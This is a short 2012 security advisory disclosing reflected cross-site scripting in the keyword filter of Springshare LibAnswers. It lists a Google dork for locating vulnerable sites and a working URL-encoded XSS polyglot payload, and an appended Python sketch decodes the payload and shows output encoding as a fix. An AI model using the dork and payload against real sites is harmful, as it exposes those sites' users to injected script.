# Exploit Title: LibAnswers Springshare Library Cross Site Scripting
# Date: 6.02.2012
# Author: Sony
# Software Link: http://www.springshare.com/libanswers/
# Google Dorks: browse.php?tid= intext:Powered by Springshare
# Web Browser: Mozilla Firefox
# Blog: http://st2tea.blogspot.com
# PoC: http://st2tea.blogspot.com/2012/02/libanswers-springshare-library-cross.html

..................................................................

Well, we have xss in Filter by Keyword:

Our xss code:
http://codepad.org/LqL68vIQ

Demo:
http://demo.libanswers.com/browse.php?tid=0&f=[our xss is here]

http://demo.libanswers.com/browse.php?tid=0&f=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E

http://1.bp.blogspot.com/-i-ou8k7YbpY/Ty__2hD11NI/AAAAAAAAAaw/DWcCzOLPwi4/s1600/libanswers.JPG

..................................................................

InSecurity.Ro
Because we care, we're security aware!
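
A mitigation sketch for the reflected f (Filter by Keyword) parameter, added here and not taken from the advisory or from Springshare's code: it decodes the demo URL above and encodes the value for HTML output and for an inline JavaScript string literal. The reflection contexts and the helper names (keyword_from_url, for_html, for_js_string) are assumptions; the advisory does not say where the value is echoed.

```python
import html
import json
from urllib.parse import parse_qs, urlsplit

# Demo URL exactly as printed in the advisory (raw strings keep the literal "\").
DEMO_URL = (
    r"http://demo.libanswers.com/browse.php?tid=0&f="
    r"%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F"
    r"\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F"
    r"%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F"
    r"\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F"
    r"--%3E%3C%2FSCRIPT%3E%22%3E%27%3E"
    r"%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E"
)

# Characters that can end a <script> block, open an HTML comment or close a
# single-quoted literal; written as \uXXXX so the HTML parser never sees them.
_JS_EXTRA = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026", "'": "\\u0027"}


def keyword_from_url(url):
    """Return the decoded f (Filter by Keyword) value, or '' if absent."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("f", [""])[0]


def for_html(value):
    """Encode for HTML text and for quoted attribute values (assumed context)."""
    return html.escape(value, quote=True)


def for_js_string(value):
    """Return a complete double-quoted JS string literal for an inline <script>
    (assumed context)."""
    literal = json.dumps(value)  # escapes ", \ and control/non-ASCII characters
    return "".join(_JS_EXTRA.get(ch, ch) for ch in literal)


if __name__ == "__main__":
    keyword = keyword_from_url(DEMO_URL)
    print("decoded  :", keyword)
    print("html     :", for_html(keyword))
    print("js string:", for_js_string(keyword))
```

Each encoder is only safe in the context it names; a value written into a JavaScript string must go through for_js_string, not for_html.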